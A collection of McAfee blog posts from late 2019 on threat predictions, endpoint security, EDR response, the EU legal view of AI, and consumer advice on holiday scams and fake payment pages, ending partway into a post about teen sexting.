As time moves onwards, the pace of technology has brought increased processing power, memory and storage to facial recognition technology. New products have leveraged facial recognition in innovative ways to simplify everyday life, from unlocking smart phones, to passport ID verification in airports, and even as a law enforcement aid to identify criminals on the street.

One of the most prevalent enhancements to facial recognition is the advancement of artificial intelligence (AI). A recent manifestation of this is deepfakes, an AI-driven technique producing extremely realistic text, images, and videos that are difficult for humans to tell apart from the real thing. Primarily used to spread misinformation, the technique leverages Generative Adversarial Networks (GANs), a recent analytic technology that, on the downside, can create fake but incredibly realistic images, text, and videos. Enhanced computers can rapidly process numerous biometrics of a face and mathematically build or classify human features, among many other applications. While the technical benefits are impressive, the underlying flaws inherent in all types of models represent a rapidly growing threat, which cyber criminals will look to exploit.

As these technologies are adopted over the coming years, a very viable threat vector will emerge, and we predict adversaries will begin to generate deepfakes to bypass facial recognition. It will be critical for businesses to understand the security risks presented by facial recognition and other biometric systems, to invest in educating themselves on those risks, and to harden critical systems.

Ransomware Attacks to Morph into Two-Stage Extortion Campaigns

By John Fokker

In McAfee’s 2019 threat predictions report, we predicted cyber criminals would partner more closely to boost threats; over the course of the year, we observed exactly that. Ransomware groups used pre-infected machines from other malware campaigns, or used remote desktop protocol (RDP) as an initial launch point for their campaign. These types of attacks required collaboration between groups. This partnership drove efficient, targeted attacks which increased profitability and caused more economic damage. In fact, Europol’s Internet Organised Crime Threat Assessment (IOCTA) named ransomware the top threat that companies, consumers, and the public sector faced in 2019.

Based on what McAfee Advanced Threat Research (ATR) is seeing in the underground, we expect criminals to exploit their extortion victims even more moving forward. The rise of targeted ransomware created a growing demand for compromised corporate networks. This demand is met by criminals who specialize in penetrating corporate networks and sell complete network access in one go.

Here are examples of underground ads offering access to businesses:

Figure 1: RDP access to a Canadian factory being offered

Figure 2: Access to an Asian food, consumer and industrial company being offered

For 2020, we predict the targeted penetration of corporate networks will continue to grow and ultimately give way to two-stage extortion attacks. In the first stage cybercriminals will deliver a crippling ransomware attack, extorting victims to get their files back. In the second stage criminals will target the recovering ransomware victims again with an extortion attack, but this time they will threaten to disclose the sensitive data stolen before the ransomware attack.

During our research on Sodinokibi we observed two-stage attacks, with cryptocurrency miners installed before the actual ransomware attack took place. For 2020, we predict that cybercriminals will increasingly exfiltrate sensitive corporate information prior to a targeted ransomware attack, in order to sell the stolen data online or to extort the victim and increase monetization.

Application Programming Interfaces (API) Will Be Exposed as The Weakest Link Leading to Cloud-Native Threats

By Sekhar Sarukkai

A recent study showed that more than three in four organizations treat API security differently than web app security, indicating API security readiness lags behind other aspects of application security. The study also showed that more than two-thirds of organizations expose APIs to the public to enable partners and external developers to tap into their software platforms and app ecosystems.

APIs are an essential tool in today’s app ecosystem including cloud environments, IoT, microservices, mobile, and Web-based customer-client communications. Dependence on APIs will further accelerate with a growing ecosystem of cloud applications built as reusable components for back-office automation (such as with Robotic Process Automation) and growth in the ecosystem of applications that leverage APIs of cloud services such as Office 365 and Salesforce.

Threat actors are following the growing number of organizations using API-enabled apps because APIs continue to be an easy – and vulnerable – means to access a treasure trove of sensitive data. Despite the fallout of large-scale breaches and ongoing threats, APIs often still reside outside of the application security infrastructure and are ignored by security processes and teams. Vulnerabilities will continue to include broken authorization and authentication functions, excessive data exposure, and a failure to focus on rate limiting and resource limiting attacks. Insecure consumption-based APIs without strict rate limits are among the most vulnerable.

Headlines reporting API-based breaches will continue into 2020, affecting high-profile apps in social media, peer-to-peer, messaging, financial processes, and others, adding to the hundreds of millions of transactions and user profiles that have been scraped in the past two years. The increasing need and hurried pace of organizations adopting APIs for their applications in 2020 will expose API security as the weakest link leading to cloud-native threats, putting user privacy and data at risk until security strategies mature.

Organizations seeking improvement in their API security strategy should pursue a more complete understanding of their Cloud Service APIs through comprehensive discovery across SaaS, PaaS and IaaS environments, implement policy-based authorization, and explore User and Entity Behavior Analytics (UEBA) technology to detect anomalous access patterns.

DevSecOps Will Rise to Prominence as Growth in Containerized Workloads Causes Security Controls to ‘Shift Left’

By Sekhar Sarukkai

DevOps teams can continuously roll out micro-services and interacting, reusable components as applications. As a result, the number of organizations prioritizing the adoption of container technologies will continue to increase in 2020. Gartner predicts that “by 2022, more than 75 percent of global organizations will be running containerized applications in production – a significant increase from fewer than 30 percent today.”[1] Container technologies will help organizations modernize legacy applications and create new cloud-native applications that are scalable and agile.

Containerized applications are built by assembling reusable components on software defined Infrastructure-as-Code (IaC) which is deployed into Cloud environments. Continuous Integration / Continuous Deployment (CI/CD) tools automate the build and deploy process of these applications and IaC, creating a challenge for pre-emptive and continuous detection of application vulnerabilities and IaC configuration errors. To adjust to the rise in containerized applications operating in a CI/CD model, security teams will need to conduct their risk assessment at the time of code build, before deployment. This effectively shifts security “left” in the deployment lifecycle and integrates security into the DevOps process, a model frequently referred to as DevSecOps.

Additionally, threats to containerized applications are introduced not only by IaC misconfigurations or application vulnerabilities, but also by abused network privileges which allow lateral movement during an attack. To address these run-time threats, organizations are increasingly turning to cloud-native security tools developed specifically for container environments. Cloud Access Security Brokers (CASB) are used to conduct configuration and vulnerability scanning, while Cloud Workload Protection Platforms (CWPP) act as traffic enforcers for network micro-segmentation based on the identity of the application, regardless of its IP. This application identity-based enforcement will push organizations away from the five-tuple approach to network security, which is increasingly irrelevant in the context of ephemeral container deployments.

When CASB and CWPP solutions integrate with CI/CD tools, security teams can meet the speed of DevOps, shifting security “left” and creating a DevSecOps practice within their organization. Governance, compliance, and overall security of cloud environments will improve as organizations accelerate their transition to DevSecOps with these cloud-native security tools.

 

1. Gartner, Best Practices for Running Containers and Kubernetes in Production, Arun Chandrasekaran, 25 February 2019.

The post McAfee Labs 2020 Threats Predictions Report appeared first on McAfee Blogs.

Endpoint Security 301: When Products, Policies, and People Break Down the Lines of Communication https://www.mcafee.com/blogs/enterprise/endpoint-security/endpoint-security-301-what-to-do-when-products-policies-and-people-break-down-the-lines-of-communication/ https://www.mcafee.com/blogs/enterprise/endpoint-security/endpoint-security-301-what-to-do-when-products-policies-and-people-break-down-the-lines-of-communication/#respond Wed, 04 Dec 2019 16:00:05 +0000 /blogs/?p=97654

Security architecture is like the ocean: no one owns it, and it is constantly affected by change. New technologies are introduced, staff changes occur, and as a result, communication suffers. I often see environments where ownership is placed into silos across teams in the enterprise, meaning IT administrators preventing threats may not get the insights uncovered by security operations teams. On the other hand, SecOps may not receive details on why a policy or configuration change has occurred. What’s more, in environments without effective integration between security tools, this lack of communication means the insights and visibilities that might benefit other stakeholders rarely travel or surface outside the immediate security team.

Add into the mix a pool of security tools that can’t co-exist — or that do so poorly, in a way that causes conflicts between them — and the situation is complicated even further. Clearly, implementing an effective, comprehensive endpoint strategy is one challenge, but maintaining that strategy is usually where the real battle begins.

A crucial part of winning this battle is ensuring that IT security administrators and SecOps work together effectively. Let’s examine how these two can do so to ensure all bases and endpoints are covered.

A Lack of Alignment Exacerbates the Skills Gap

A quick reminder: IT security teams are responsible for the health of the network and IT infrastructure, requiring them to focus on access controls, endpoint protection, and vulnerability management. SecOps teams, meanwhile, establish the rules their organization must follow to secure their environment.

Logically, these teams should work hand-in-hand, but in most enterprises they are siloed due to functional or technical limits. Each has little visibility into what the other side is doing on a day-to-day basis, plus a complete lack of insight into longer-term strategic security initiatives. This can lead to a breakdown in rules, configurations, and escalations that has a detrimental impact on an enterprise’s infrastructure.

Lack of communication can also make it hard for IT security admins to know how to escalate and prioritize issues, and it prevents SecOps from upskilling. For example, junior analysts can only address about 30% of alerts today. The remainder require a higher skill set to remediate, a problem that’s only compounded by the lack of qualified cybersecurity talent. In fact, some estimates expect the number of unfilled cybersecurity jobs to rise to 3.5 million by 2021, and because many SecOps tools today require significant experience to operate, communication and education will only become more critical.

Establishing Shared Visibility Between Teams

Now that we know the issues that can arise when SecOps and IT admins don’t communicate, let’s address some of the solutions and outcomes. It all starts with better, shared visibility. When each team has insight into what the other is working on, teams are no longer siloed, and less time is spent on alerts and false positives that frontline IT can handle rather than SecOps. This means that if an eventual hack or breach does occur, more time and effort can be spent on threat remediation in order to strengthen an enterprise’s endpoint environment.

Shared visibility extends into joint policy creation as well. When forming policies, if IT admins and SecOps provide their respective input, there is less of a chance of miscommunication or misconfiguration. Policy changes can be understood from the get-go by forming a holistic approach, with the necessary expertise and insights from both teams coming together to create an overarching endpoint security strategy that’s more secure.

SecOps and IT must also find a way to extend that visibility to new team members. In my experience, solving security architecture issues requires a two-pronged approach. First, the security industry should take more responsibility for designing products usable by both the most advanced security professionals and operational staff and analysts. Second, organizations must ensure that continuity at customer sites is maintained across staff rotations through documented policies that support product configurations. In other words, organizations must ensure the appropriate processes are in place to support the security tools they deploy. This historical knowledge matters because, anecdotally, I find that a significant number of escalations are addressable simply by reverting a customer environment back to default settings. New employees are unaware of this quick fix and therefore waste precious time and resources on unnecessary efforts.

Collaborating for True Endpoint Security

With these challenges in mind, we recommend the following steps.

  • Create visible, documented policies for all products and scenarios. This helps overcome a lack of communication, staff turnover, and the inability of products to integrate.
  • Conversely, seek integration and automation. And in fact, organizations are doing so, with over 70% pursuing increased automation in endpoint security, including automated detection and response.
  • Establish cross-functional collaboration in other ways. For example, require IT admins to flag threats to SecOps.
  • Review your policy book and guidelines quarterly so that the latest technology and processes can be effectively integrated into guidelines.

IT security admins and SecOps teams don’t have to — and shouldn’t — do their jobs alone. To cover all bases, they can leverage a multitude of endpoint security solutions with proactive, collaborative, and integrated technology built in. These solutions allow IT security admins and SecOps teams to focus their efforts elsewhere, such as on strategic projects, policies, and insights.

McAfee MVISION Endpoint and MVISION Mobile, for example, build machine learning (ML) algorithms and analysis into their architecture to help monitor and identify malicious behavior. Additionally, McAfee Endpoint Detection & Response combines real-time endpoint monitoring and data collection with rules-based automated response and analysis capabilities so that both IT security and SecOps can be involved in the process of fostering effective enterprise endpoint security in a way that makes both of their jobs easier.

With the proper visibility between IT security and SecOps teams, advanced security solutions not only bring an endpoint security strategy full circle but also allow for more time to be spent on collaboration and teamwork. An endpoint security strategy is only as strong as its weakest link – human, solution, or otherwise. Enterprises should ensure that their weakest link isn’t a vulnerable missing link between IT admins and SecOps.

To learn more about effective endpoint security strategy, be sure to follow us @McAfee and @McAfee_Business.

 

The post Endpoint Security 301: When Products, Policies, and People Break Down the Lines of Communication appeared first on McAfee Blogs.

McAfee Up Levels Insights for Customers https://www.mcafee.com/blogs/enterprise/mcafee-up-levels-insights-for-customers/ https://www.mcafee.com/blogs/enterprise/mcafee-up-levels-insights-for-customers/#respond Tue, 03 Dec 2019 17:16:54 +0000 /blogs/?p=97690

Authored by Anand Ramanathan

McAfee recently announced MVISION Insights designed to help customers proactively detect, rank and respond quickly and accurately to threats.

On top of having to respond to threats that persistently target their companies, security professionals also face another huge challenge – prioritizing what threat information is relevant from the huge volume of data being presented to them. At McAfee we know how critical time optimization has become to security. So, we are focusing as a team on helping customers not only identify and report on the threats that pose a risk to businesses at large, but also have intelligent insights so they can prioritize information and take action to allocate resources when and where it really matters.

To deliver these insights, we are continually innovating our products and services, and part of that innovation means looking outside of McAfee to bring in the best technologies for our products. For this initiative, this meant adding a leader in security analytics and graph theory, Uplevel, to the McAfee family. Uplevel’s graph analysis platform will allow our customers to more quickly understand the threats that they’re facing and effectively select the right course of action. Combined with McAfee’s world-class data lake, we’re aiming to help our customers have the most comprehensive review of threats and their risk.

In addition to the technology, the Uplevel team led by Liz Maida brings a wealth of experience to McAfee, and specifically the Enterprise Security Business Unit. Liz’s ability to identify pain points for companies and develop solutions that address these will be instrumental in the future development of McAfee technologies and services.

Bringing Uplevel into the McAfee family – along with other recent acquisitions  – demonstrates McAfee’s commitment to innovation that will allow us to be the best device-to-cloud cybersecurity company for our customers and partners.

The post McAfee Up Levels Insights for Customers appeared first on McAfee Blogs.

Are All Phishing Scams Easy to Spot? https://www.mcafee.com/blogs/consumer/hackable/are-all-phishing-scams-easy-to-spot/ https://www.mcafee.com/blogs/consumer/hackable/are-all-phishing-scams-easy-to-spot/#respond Tue, 03 Dec 2019 17:09:24 +0000 /blogs/?p=97684

The number of phishing scams that hide malware or malicious links is on the rise for a simple reason: they still work because people are the weakest link of any cybersecurity system. Some schemes are a numbers game — a hacker sends out thousands of emails to random people with the hope of getting a few to click. Others are highly-targeted, spear-phishing attacks that involve gathering information about a single person so that the hacker can exploit a very specific vulnerability.

On the latest episode of “Hackable?” we find out just how hackers go spear-phishing when our cybersecurity expert Bruce Snell creates his own scheme. His target? Who else but producer Pedro Mendes. Listen and learn whether or not Pedro clicks, and how you can help protect your data and devices.

Listen to “Hackable?” today.

The post Are All Phishing Scams Easy to Spot? appeared first on McAfee Blogs.

Cybersecurity & Artificial Intelligence (AI) – a view from the EU Rear Window, Part I https://www.mcafee.com/blogs/enterprise/data-security/cybersecurity-artificial-intelligence-ai-a-view-from-the-eu-rear-window-part-i/ https://www.mcafee.com/blogs/enterprise/data-security/cybersecurity-artificial-intelligence-ai-a-view-from-the-eu-rear-window-part-i/#comments Mon, 02 Dec 2019 17:50:12 +0000 /blogs/?p=97656

Much has been said about the power of AI and how tomorrow’s CISO won’t be able to provide efficient cybersecurity without it.

The hype surrounding AI is based on both the quickening pace of natural language capability development and the current deficiency of capable and competent cybersecurity professionals.

A quick clarification of what AI is and to what extent it exists today may be useful before explaining the legal recognition it has today, including in the world of cybersecurity.

What is AI? Does it exist yet?

The term “artificial intelligence” is rather vague from a legal standpoint—and in the legal world, words tend to have a strong impact. For French people (and for most people around the world), the official definition of AI is as follows: “A theoretical and practical interdisciplinary field whose purpose is to understand the mechanisms of cognition and reflection, and their imitation by a material and software device, for purposes of assistance or substitution to human activities”.

AI now has full recognition of the EU Parliament as a result of the 2018/2088(INI) Motion on Comprehensive European Industrial Policy on Artificial Intelligence and Robotics, also known as the Ashley Fox Resolution, dated 12 February 2019 (Motion). Interestingly, this resolution specifically mentions the implications of AI for cybersecurity:

“Notes that cybersecurity is an important aspect of AI, especially given the challenges for transparency in high level AI; considers that the technological perspective, including auditing of the source code, and requirements for transparency and accountability should be complemented by an institutional approach dealing with the challenges of introducing AI developed in other countries into the EU single market.”

So, with such official recognition, why do we read everywhere that real AI does not exist yet?

The argument made is that, although the goal is to replace the human being, AI may only provide augmented intelligence which assists the human being.

In fact, says J. McCarthy, as far back as the 1956 Dartmouth Artificial Intelligence Conference, the conference was “to proceed on the basis of the conjecture that every aspect of learning or any other feature of intelligence can in principle be so precisely described that a machine can be made to simulate it.”

More than 60 years later, machine learning is still not autonomous. But it does exist to a certain degree, and the capability of machine learning combined with the accumulation of today’s databases makes it possible to create algorithms capable of performing tasks that have never been automated before. AI, or at least a certain form of AI, is today part of our daily lives, and understanding this technology is essential so that it can be accepted and integrated into our societies.

In Part II of this blog, we’ll examine the economic, political and ethical challenges in the development of AI, particularly as they pertain to cybersecurity. 

The post Cybersecurity & Artificial Intelligence (AI) – a view from the EU Rear Window, Part I appeared first on McAfee Blogs.

How to Ensure You Don’t Fall Victim to a Holiday Scam this Festive Season https://www.mcafee.com/blogs/consumer/consumer-threat-notices/how-to-ensure-you-dont-fall-victim-to-a-holiday-scam-this-festive-season/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/how-to-ensure-you-dont-fall-victim-to-a-holiday-scam-this-festive-season/#respond Mon, 02 Dec 2019 01:56:15 +0000 /blogs/?p=97649

If Benjamin Franklin were alive today, I have no doubt that he’d revise his famous quote: ‘Nothing can be said to be certain except death and taxes’ to include online holiday scams! For there is no question that online scammers and cybercriminals love the festive season! The bulk of us are time-poor, stressed, and sporting to-do lists as long as our arms – so cybercrims know it’s inevitable that some of us are going to take short cuts with our online safety and fall into their webs!

And McAfee research shows just that, with over a third of Aussies having either fallen victim to a phishing scam in 2019 or knowing someone who has. A phishing scam is when a scammer poses as a trustworthy entity (for example, a bank or government department), usually via email, with the sole purpose of trying to extract sensitive information such as passwords, usernames and credit card details. And clearly, phishing is a very lucrative online trick, as it was named the worst scam of 2019!

Top Scams of 2019

Although phishing scams have taken out the top place for 2019, robocalling scams and shipping notification scams have also caused Aussies great pain this calendar year.

If you receive a phone call with a pre-recorded message that presents a grim scenario if you don’t take action then you’ve been robocalled! My family’s ‘favourite’ one from 2019 was the scam which delivered a pre-recorded message advising us that our phone line would be cut unless we spoke immediately to their technician. The Australian Telecommunications Ombudsman was overrun with complaints about this particular heist which backs up McAfee’s research that shows 32% of Aussies either fell victim to this scam, or knew someone who did.

Shipping notification scams have also caused Aussies grief this year, with more than a quarter of us (26%) affected or in touch with someone who was. The meteoric rise of online shopping has meant that when many of us are notified about an impending delivery, we probably don’t stop to question its authenticity.

How Much Are Scams Costing Aussies?

In Australia, 1 in 10 scam victims (11%) have lost money as a result of being targeted by a scam. And a quarter of those affected have lost more than $500! Now, that’s a sizeable chunk of cash!

But in addition to an initial monetary sting, having your personal details ‘stolen’ via a scam may come back to haunt you later down the track. According to McAfee’s Advanced Threat Research (ATR), more than 2.2 billion stolen account credentials were made available on the criminal underground in just the first 3 months of 2019!

Cybercriminals Love the Holidays!

The holiday season is particularly stressful for consumers, and cybercriminals plan accordingly. Many of us ramp up our online shopping in the lead-up to the holiday period and, as our ‘to-do’ lists get longer, some of us will inevitably let our guard down online. And cybercriminals know this too well so consequently spend a lot of effort devising cunning schemes to take advantage of our corner-cutting.

Cybercriminals put a lot of effort into devising fake accounts and sites to target consumers around key holiday shopping periods; however, some Aussies aren’t aware of these ploys, with 21% of the Aussies interviewed unaware that scams like these existed.

How Can Consumers Stay Safe This Holiday Period?

I highly recommend that you (and your family members) take a little time this holiday period to shore up your online safety. Here are a few simple steps that consumers can take to protect themselves and avoid getting scammed this festive period:

  1. Think Before Clicking on Links

With phishing scams revealed to be the worst scam of the year, it is more important than ever to think before clicking on links. Instead of clicking on a link in an email, it is always best to check directly with the source to verify an offer or shipment.

  2. Passwords, Passwords, Passwords

With just one hack, cybercriminals can get their hands on thousands of passwords, which they can then use to try to access multiple accounts. By using a different password for each shopping, media streaming or social media account, you can dramatically reduce this risk.

  3. Invest in Security Protection Software

Use comprehensive security protection, like McAfee Total Protection, which can help protect devices against malware, phishing attacks and other threats. It includes McAfee WebAdvisor, which can help identify malicious websites.

  4. Consider a Virtual Private Network (VPN)

A solution like McAfee Safe Connect with bank-grade encryption, private browsing services, and internet security will keep your information safe from cybercriminals – even when checking emails or online shopping on public Wi-Fi or open networks.

And finally beware bogus gift card scams! One new trend that is set to hit unsavvy consumers hard this holiday season is phoney gift cards, with McAfee’s ATR team seeing fake gift cards sold on the cybercriminal underground. Yet, despite the rise in this scam, 17 per cent of the survey respondents have never heard of bogus gift cards and over a quarter (26%) reported that they are not concerned about the threat. So, please spread the word and do your homework before buying gift cards!

Here’s to a Happy, Scam-Free Holiday Season!

The post How to Ensure You Don’t Fall Victim to a Holiday Scam this Festive Season appeared first on McAfee Blogs.

7 Ways to Wreck a Cybercrook’s Holidays https://www.mcafee.com/blogs/consumer/family-safety/7-ways-to-wreck-a-cybercrooks-holidays/ https://www.mcafee.com/blogs/consumer/family-safety/7-ways-to-wreck-a-cybercrooks-holidays/#respond Sat, 30 Nov 2019 15:00:44 +0000 /blogs/?p=97635

’Tis the season for giving and who better to give a giant headache to than the digital scammers working overtime to wreck our holidays? Can we spot and unravel every scam out there? Probably not. But, by taking a few minutes to get equipped to click, we can dodge common traps laid by cybercrooks and wreck their holidays before they get a chance to wreck ours.

Rock ‘Em Sock ‘Em Robo Calls

As informed as most of us may profess to be, American consumers continue to step into cyber traps every day. In fact, according to a recent McAfee survey, in 2019, 74% of those surveyed admitted to losing more than $100 in scams and almost a third (30%) losing more than $500. The survey also revealed that 48% of Americans have been or know someone who has been a victim of robocalling in 2019, making it the most prevalent scam of the year. Email phishing (41%) and text phishing (35%) are also tricks we fell for in 2019.

Cybercrooks call those stats a very happy holiday.

Are you equipped to click?

We can do our part to reduce these statistics. Before we all get distracted with shopping sprees or fall into sugar comas, call a family huddle. Discuss ways to avoid the digital traps and send cybercrooks into a maze of locked doors and dead ends. Here are a few ideas to get you started.

7 ways to wreck a cybercrook’s holidays

  1. Get real about cybercrime. Don’t sugar coat cybercrime for your kids. Here’s the truth: Over 2.2 billion stolen account credentials were made available on the cybercriminal underground throughout Q1 2019 alone, which puts a priceless amount of user data at risk. Crooks are targeting us. They are shopping the black web for stolen data to use in a variety of illegal ways. If we fail to lock our digital doors, the consequences can be emotionally and financially devastating and may last years.
  2. Shake up your passwords. Never use the same password. By uncovering one of your passwords, cybercriminals can get their hands on thousands of passwords, which they can then use to try to access multiple accounts. So change passwords often and use a variety, especially around the holidays when online shopping spikes.
  3. Verify emails. Slow down to examine emails. Instead of clicking on an email link, check directly with the source to verify an offer or shipment. Cybercriminals are getting very sophisticated. They are creating full websites that closely mimic brand retailers. Also, they are posing as friends, family, and colleagues in an attempt to get you to click a link that will download malware onto your computer.
  4. Browse securely. Use a comprehensive security solution to help protect devices against malware, phishing attacks, and malicious websites.
  5. Use a tool to help protect your personal information. Take a proactive approach to help protect identities with personal and financial monitoring and recovery tools that help keep your identity secure.
  6. Verify shipments. Cybercrooks understand consumer habits. They know you’ve likely ordered from several online retailers, so they will exploit that and try to confuse you by sending bogus shipment notifications or reward you with “added offers.” The email will look legitimate. It will likely have a legitimate-looking email address and the branding of the retailer or shipping company. Check directly with the source before clicking any link in an offer or shipment notification.
  7. Protect your identity. Criminals are on the prowl to find weak links anywhere personal data is kept — that includes credit card companies and banks. Get proactive in protecting your identity and the identities of your family members with personal and financial monitoring and recovery tools.

Even with the threats that exist around us, keep your sights fixed on the bigger picture. The holiday season is still merry and bright. People are still good. And, peace on earth — and in your home — is still possible this year. With a little foresight and a few cool tools, you are more than able to protect the things that matter most.

To stay informed on the latest digital news, trends, and family safety insights, subscribe to this and other McAfee blogs. Follow @McAfee_Family on Twitter to join the digital parenting conversation.

The post 7 Ways to Wreck a Cybercrook’s Holidays appeared first on McAfee Blogs.

Beat Black Friday Scammers: Secure Your Online Purchases From Fake Payment Processors https://www.mcafee.com/blogs/consumer/consumer-threat-notices/fake-payment-processors-scam/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/fake-payment-processors-scam/#respond Wed, 27 Nov 2019 16:52:19 +0000 /blogs/?p=97644

They see you when you’re shopping, they know when you click “pay” – cybercriminals, that is. With Black Friday and Cyber Monday deals flooding the internet, malicious actors have many opportunities to exploit users rushing to purchase gifts for family and friends. And according to Ars Technica, thieves have devised a new way to steal payment-card data from online shoppers, just in time for the holiday shopping season.

So, what makes this particular scam different from other credit and debit card scams? Many e-commerce sites choose to offload payment card charges to third-party payment service platforms, or PSPs. However, cybercriminals have developed fake payment service platforms that closely resemble legitimate PSPs. Rather than infecting a merchant’s checkout page with malware that skims the information after the user enters it, cybercriminals infect the merchant site by adding a line or two of code that redirects the user to a fake PSP at the time of purchase.

Image provided by Ars Technica.

What makes this scam so stealthy? Apart from swapping legitimate payment processing sites with fraudulent ones, cybercriminals closely mimic the traits of real e-banking pages to further trick the user into believing that their purchase is secure. For example, the fake payment processing page checks all the fields once the user completes them or informs the user if the field is invalid. Once the fake PSP collects the data, it redirects the unsuspecting user to the legitimate PSP and includes the purchase amount after successfully stealing the victim’s information.

Payment-service platforms are common in the world of e-commerce, particularly for smaller websites that don’t have the resources to harden their servers against sophisticated attacks. As a result, users need to be on high alert for these malicious schemes. Check out the following tips to help prevent your data from being swiped by cybercriminals.

  • Be on the lookout for suspicious activity. This particular scam redirects users from the fake PSP back to the legitimate payment site after their information has already been accepted. If you’re being asked for personal or financial data more than once, the site has likely been infected with malicious code.
  • Review your accounts. Be sure to look over your credit card and banking statements and report any suspicious activity as soon as possible.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Use a comprehensive security solution. Safeguard yourself from cybercriminals with a comprehensive security solution like McAfee Total Protection, which can help protect you from malware, phishing, and other threats.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.


The post Beat Black Friday Scammers: Secure Your Online Purchases From Fake Payment Processors appeared first on McAfee Blogs.

Response Required: Why Identifying Threats With Your EDR Isn’t Enough https://www.mcafee.com/blogs/enterprise/endpoint-security/response-required-why-identifying-threats-with-your-edr-isnt-enough/ https://www.mcafee.com/blogs/enterprise/endpoint-security/response-required-why-identifying-threats-with-your-edr-isnt-enough/#respond Mon, 25 Nov 2019 16:00:00 +0000 /blogs/?p=97584


The perpetrator was a master of disguise, outfitting himself as an employee to bypass the extensive preventive security controls and flee with the contents of the vault. Fortunately, the building was equipped with strong detection security measures, and the burglar—unaware of the location of a laser tripwire—soon set off a silent alarm. A handful of the best-equipped and most experienced officers swarmed the building just minutes later, tracing the subject to a large storage area where they found him frantically digging through the large box of documents and cramming a few in his backpack.

While the other officers stood in the hallway at the ready, one began walking toward the perp, shouting “It’s all over, buddy. This is the end of the road.” The criminal, fear-stricken, turned to run. As he began to make his way toward a freight entrance, he was dumbfounded to hear only his own footsteps reverberating off the walls. He chanced a look back at the officer, who had not moved. “You thought you could run, but we found you! You’re under arrest!” the officer shouted, still not moving a muscle. Knowing something had to be going on, the criminal took this opportunity to hurriedly backtrack to the box and grab his ill-gotten loot. He looked back at the officer, who was still frozen in place.

The criminal looked incredulously at the officer, laughed and shook his head. Feeling no threat, he slowly shuffled out with his giant box of classified documents into the night.


The “R” Is There For A Reason

What is true in the world of police is also true in the world of cybersecurity: Detection means nothing without response. And not any response, but the right response.

EDR marketing materials focus heavily on their ability to detect the largest number of the newest threats in the least amount of time. But without a broad and well-developed set of response mechanisms in place, even the best detection abilities are of little use. Unlike, say, a legacy anti-virus product, EDR isn’t a “set it and forget it” technology—you can’t just put it on your network and call it a day. Your ability to adequately respond to threats depends on two factors: having capable analysts at the helm is vital, and not limiting them with inadequate tools is an equally important part of safeguarding your enterprise.


Response Options Must Be Extensive

What if our officer instead had access to a full range of response capabilities? Criminals are unpredictable, and it’s impossible to know ahead of time whether “Put your hands up!” will be sufficient, or whether you’ll need to call for backup, use a stun gun or give chase. The ability to determine the best response isn’t enough if you don’t have access to that response method.

So it goes in cybersecurity. The EDR market is sharply divided in terms of response capabilities, and the ability—or inability—to adequately respond should be a purchasing consideration. Any decent EDR will yield the necessary context and present it in a way that allows you to easily and quickly assess the situation. A good EDR will put a panoply of response capabilities at your fingertips. Should you kill the process? Restart the machine? Quarantine the box? The amount of flexibility offered can affect how quickly you’re able to handle the threat.

Ideally, according to a SANS Institute report, your EDR should have at least the following response options:
– Terminate running processes
– Prevent processes from executing based on name, path, argument, parent, publisher or hash
– Block specific processes from communicating on the network
– Block processes from communicating with specific host names or IP addresses
– Uninstall services
– Edit registry keys and values
– Shut down or reboot an endpoint
– Log users off an endpoint
– Delete files and directories

But what do you do when the specific response you need isn’t available out of the box? In this case, you need to be able to program your own script to perform a custom action or response. Many EDRs lack the technology to make this possible, but it’s an important thing to look for—just because your business needs don’t require it now, doesn’t mean it won’t in the future.


EDR: Excessively Delayed Reaction?

What if our officer can chase a suspect, but only in baby steps? What if he or she can call for backup, but it takes them 45 minutes to arrive?

Having every response ever conceived still isn’t enough if the EDR cannot contain threats in time.

With attackers moving from initial compromise to action on objectives with increasing quickness, the old way of “reassign the ticket to IT” no longer cuts it—by the time IT notices the ticket, the attacker may already have gone.

It’s important to have at your disposal the best response. But when you don’t yet know what something is, your best response may not be your first response. In other words, sometimes you’re going to want to be able to quarantine the affected device(s) while you investigate and scope in order to limit the threat’s impact.

The ability for the EDR to integrate with existing workflows, rather than dictating those workflows, can also make a big difference. A lot of people look at MTTD (Mean Time To Detection)—but that’s only part of the story. A better indicator of an EDR’s effectiveness is MTTR (Mean Time To Response). According to SANS Institute analyst Jake Williams, enterprises that have orchestrated actions between detection and response have MTTR metrics that are both more favorable and more reliable.

There’s no shortage of EDR solutions on the market, at all levels of speed and capability. It’s worth making sure that yours offers as much in terms of response as it does in detection—remember, when you choose an EDR, you’re partnering with the technology that will serve and protect your enterprise. When the chips are down, are you going to have an EDR that can identify, track and eliminate a threat in time to prevent massive devastation?

In a future blog, we’ll explain how detection and response should work in parallel with prevention to safeguard your enterprise.

Want to learn more about what to look for—and watch out for—in an EDR? Click here to read “Why Traditional EDR Is Not Working—and What To Do About It.”

The post Response Required: Why Identifying Threats With Your EDR Isn’t Enough appeared first on McAfee Blogs.

Could Your Child be Sexting? Signs to Look for and Ways to Respond https://www.mcafee.com/blogs/consumer/family-safety/could-your-child-be-sexting-signs-to-look-for-and-ways-to-respond/ https://www.mcafee.com/blogs/consumer/family-safety/could-your-child-be-sexting-signs-to-look-for-and-ways-to-respond/#respond Sat, 23 Nov 2019 15:00:04 +0000 /blogs/?p=97588

Oh, what we wouldn’t do to travel back in time to the days before smartphones kid-jacked our families, right? But here we are. Our kids are forever connected. And, it’s up to parents to help them navigate the risks — one of which is sexting.

Ouch. Even reading the word may make any parent want to click off this post and run. But don’t. Stay here. Keep reading. Yes, it’s a difficult thing to imagine that your child could be like those “other kids.” (You know, the unruly ones; the wild ones, the ones who must lack parental input and digital monitoring, right?)

But it happens. Good kids — great kids even — may bend the rules and eventually engage in sexting.

As one parent recently reminded us with this Direct Message on Twitter:

“I recently discovered my daughter has been sexting with her boyfriend. I’m still shaking over what I found. This is not like her at all. The worst part is she blew it off like it was no big deal! She says everyone does it, and I’m overreacting. Am I the crazy one here? Do a lot of kids do this? Please help. No clue what to do next.” ~ Minnesota Mom

Sexting stats

For Minnesota Mom, and others, here’s what we know.

Some, but not all, kids sext.

